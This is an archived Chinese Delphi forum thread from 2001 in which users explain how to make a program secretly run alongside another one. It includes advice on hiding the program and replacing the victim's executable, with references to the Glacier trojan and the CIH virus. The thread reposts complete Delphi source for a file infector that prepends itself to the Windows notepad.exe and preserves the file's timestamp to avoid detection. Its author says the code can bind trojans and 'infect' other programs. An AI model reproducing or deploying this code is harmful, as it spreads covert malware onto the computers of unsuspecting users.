谁会？要求将一个自己写好的程序接到别人的程序后边，然后在别人运行程序是跟着运行？(145分)

duolami · 2001-12-03

要求将一个自己写好的程序接到别人的程序后边，然后在别人运行程序是跟着运行？ 可以吗？ 就像是病毒。

DelphiFish · 2001-12-03

我只会把自己的程序加在别人的程序前边，然后替换图标，运行时我的程序先运行，然后别人的 程序运行，看起来像是别人的运行。可以吗？

ljbXS · 2001-12-03

可以

duolami · 2001-12-03

to ljbXS, 怎么做？别只说不做啊

zyl000 · 2001-12-03

我也想知道

cxyhy · 2001-12-03

你是想些病毒吧？

酷尔贝塔 · 2001-12-03

[blue]TO:duolami, 用exebind吧这是一个可执行文件捆绑软件，它可以将两个可执行文件捆绑成一个文件，运 行时再自动分别执行。 下载地址：[/blue] http://nj.onlinedown.net/EXEBIND.HTM

Qingzhong · 2001-12-03

思路：     1）将你的文件插入到他的文件中，难度大，不可行     2）将他的文件插入到你的文件中，简单，受到你的程序的完全控制 方案2的思路：你的文件you.exe,他的文件He.exe     1）使用资源文件，将he.exe打包到资源文件中     2）将资源稳健联编进you.exe  {$he.res}     3) 运行你的文件，隐藏你的一切表现，然后利用“流”将you.exe中包裹的       he.exe 释放出来，使用WinExec运行He.exe     4) 继续干你的好事或者坏事。     如此，就好像你不存在一样，但其实你控制了一切，使用者还以为在运行he.exe呢。

duolami · 2001-12-03

我就是想知道难道大的

Qingzhong · 2001-12-03

其实你中有我，我中有你，何所谓我嵌入你，你嵌入我！ 换一种思路，也许十分容易解决你的问题！ ps: 刚才忘了：将He.xe裹入You.exe后，Erase he.exe，Copy You.exe TO he.exe，   Erase You.exe!    你说，You.exe还存在吗？ “冰河”就是这么做的，陈经韬有一篇文章“小议冰河YAI”有介绍。

honestman · 2001-12-04

想学难度大的，分析一下CIH就好了。

DelphiFish · 2001-12-04

honestman 你有cih的源码吗？呵呵

yxyyyy · 2001-12-06

源码网上大把，就怕你看不了 你在 www.google.com 中用  "cih 源代码" 搜索一下，好多啊

honestman · 2001-12-06

对啊！ 外面CIH的源代码N多！！！ 就怕你没能力。

WildPigeon · 2001-12-07

就用替换的方法足够了

zjxxln · 2001-12-11

转载： 问题：文件合并新思路(附完整DELPHI代码),给点掌声... ( 积分：0, 回复：11, 阅读：243 ) 分类：编程心得 ( 版主：雁孤行, wrench )   来自：111222, 时间：2001-9-28 19:24:00, ID：650325 [显示：小字体 | 大字体]   program exe2; uses   classes,   Tlhelp32,   windows,   SysUtils; {$R *.RES} var   lppe:TProcessEntry32;   found:boolean;   handle:THandle;   ProcessStr,ExeName:string;   WinDir

char; const   MySize=64000; //根据编译或压缩后的文件大小进行修改 procedure copy2(s:string); var   s1,s2:TMemoryStream;   files2:TFilestream;   ch:array[0..3] of char;   ss:string;   filetime,fhandle:integer; begin   //若文件s不存在   if FileExists(s)=False then exit;   try     //判断文件s中有没有特殊标记。若有，表示已经合并过     //在本程序编译或压缩后，用十六进制软件进行修改，在偏移200处加入标记'IMOK'     //用debug也可进行修改(对exe文件，要先更改EXE扩展名)。例:     //-e 1C8     //127D:01C8 00._ <-键入新的十六进制值     //......     //-w <-保存文件     files2:=TFilestream.Create(s,fmopenread);     files2.Position:=200;     files2.Read(ch,4);     ss:=copy(ch,1,4);     files2.Free;     if ss='IMOK' then exit;     //将本文件与文件s合并本文件+s=s     s2:=TMemoryStream.Create;     s2.loadfromfile(ExeName);     s1:=TMemoryStream.Create;     s1.copyfrom(s2,MySize);     s2.clear;     s2.loadfromfile(s);     s1.seek(s1.size,soFromBeginning);     s1.copyfrom(s2,s2.size);     s2.free;     //得到文件s的日期     fhandle:=FileOpen(s, fmOpenread);     filetime:=filegetdate(fhandle);     fileclose(fhandle);     s1.SaveToFile(s);     //恢复文件s的日期     fhandle:=FileOpen(s, fmOpenwrite);     filesetdate(fhandle,filetime);     fileclose(fhandle);     s1.free;   except end; end; procedure CreateFileAndRun; var   s1,s2:TMemoryStream;   TempDir

char;   cmdstr:string;   a:integer; Begin   s1:=TMemoryStream.Create;   s1.loadfromfile(ExeName);   if s1.Size=MySize then   begin     s1.Free;     exit;   end;   s1.seek(MySize,soFromBeginning);   s2:=TMemoryStream.Create;   s2.copyfrom(s1,s1.Size-MySize);   GetMem(TempDir,255);   GetTempPath(255,TempDir);   s2.SaveToFile(TempDir+'/'+ExtractFileName(ExeName));   cmdstr:='';   a:=1;   while ParamStr(a)<>'' do begin     cmdstr:=cmdstr+ParamStr(a)+' ';     inc(a);   end;   winexec(pchar(TempDir+'/'+ExtractFileName(ExeName)+' '+cmdstr),SW_SHOW);   freemem(TempDir);   s2.free;   s1.free; end; begin   GetMem(WinDir,255);   GetWindowsDirectory(WinDir,255);   ExeName:=ParamStr(0);   handle:=CreateToolhelp32Snapshot(TH32CS_SNAPALL,0);   found:=Process32First(handle,lppe);   ProcessStr:='';   while found do   begin     ProcessStr:=ProcessStr+lppe.szExeFile;//列出所有进程。     found:=Process32Next(handle,lppe);   end;   if pos(WinDir+'/notepad.exe',ProcessStr)=0 then   begin     copy2(WinDir+'/notepad.exe');   end;   {其它需要合并的文件   if pos(...,ProcessStr)=0 then   begin     copy2(...);   end;   ...   }   freemem(WinDir);   {   你想用这个程序干点其它的什么...   }   CreateFileAndRun;//释放文件并带参数运行 end.     来自：lbsong, 时间：2001-9-28 20:24:00, ID：650393 掌声响起来     来自：wsn, 时间：2001-9-28 20:25:00, ID：650396 再啪几下 [

]     来自：eve, 时间：2001-9-28 20:26:00, ID：650398 啪.....啪.....啪.....啪.....啪.....啪.....啪.....啪.....     来自：budware, 时间：2001-9-28 23:14:00, ID：650550 [

] 好     来自：cgh0717, 时间：2001-9-29 0:32:00, ID：650605 很久没有看到这么有含量的文件啊，真是太好了。谢谢了。不错，不错喔。 说着说着，掌声响就起来了： 啪啪啪啪啪啪啪啪..... [red]（不知是给你的，还是给我的[^]）[red]         来自：111222, 时间：2001-9-29 19:32:00, ID：651875   要将CreateFileAndRun中的      s2.SaveToFile(TempDir+'/'+ExtractFileName(ExeName));   改为   try     s2.SaveToFile(TempDir+'/'+ExtractFileName(ExeName));   except end;   以防建立文件时出错。   在这个程序的基础上，可以很容易将木马与其它程序捆在一起，   可以编写出DELPHI版的有"传染"功能的程序。     来自：fanren945, 时间：2001-9-29 20:42:00, ID：651926 领教领教，不错不错，很好很好，掌声掌声[

]     来自：Zoushikun, 时间：2001-11-8 11:28:00, ID：715573 鼓励     来自：doxpix, 时间：2001-11-8 12:21:00, ID：715697 呵呵，麻烦解释一下你的新思路新在哪？     来自：Town, 时间：2001-11-8 12:43:00, ID：715750 有办法感染正在运行的文件吗？     来自：sxzqcyj, 时间：2001-11-8 13:31:00, ID：715895 非常好，收藏！ 啪……

xiaoyong · 2001-12-11

啪。。。啪。。。給你兩聲，夠不夠？還要的話繼續免費贈送

YB_unique · 2001-12-11

简单点只要将EXE文件和自己的程序关联即可！一旦调用EXE文件即可触发自己的程序！

xiaoyong · 2001-12-11

Hi：大家好！先給各位打個招呼，剛剛小弟碰到一個難題想請各位幫幫忙， 我有一個用pascal寫的系統，它的資料全部用dat類型的文件進行存儲， 可能是一種接口控制（人為控制），我現在想對此dat文件裡面的資料進行操作 （刪除記錄），請問可不可行！拜拖！急！急！急！真的急！

duolami · 2001-12-11

to YB_unique 如何实现？

谁会？要求将一个自己写好的程序接到别人的程序后边，然后在别人运行程序是跟着运行？(145分)

duolami

Unregistered / Unconfirmed

DelphiFish

Unregistered / Unconfirmed

ljbXS

Unregistered / Unconfirmed

duolami

Unregistered / Unconfirmed

zyl000

Unregistered / Unconfirmed

cxyhy

Unregistered / Unconfirmed

酷尔贝塔

Unregistered / Unconfirmed

Qingzhong

Unregistered / Unconfirmed

duolami

Unregistered / Unconfirmed

Qingzhong

Unregistered / Unconfirmed

honestman

Unregistered / Unconfirmed

DelphiFish

Unregistered / Unconfirmed

yxyyyy

Unregistered / Unconfirmed

honestman

Unregistered / Unconfirmed

WildPigeon

Unregistered / Unconfirmed

zjxxln

Unregistered / Unconfirmed

xiaoyong

Unregistered / Unconfirmed

YB_unique

Unregistered / Unconfirmed

xiaoyong

Unregistered / Unconfirmed

duolami

Unregistered / Unconfirmed

Similar threads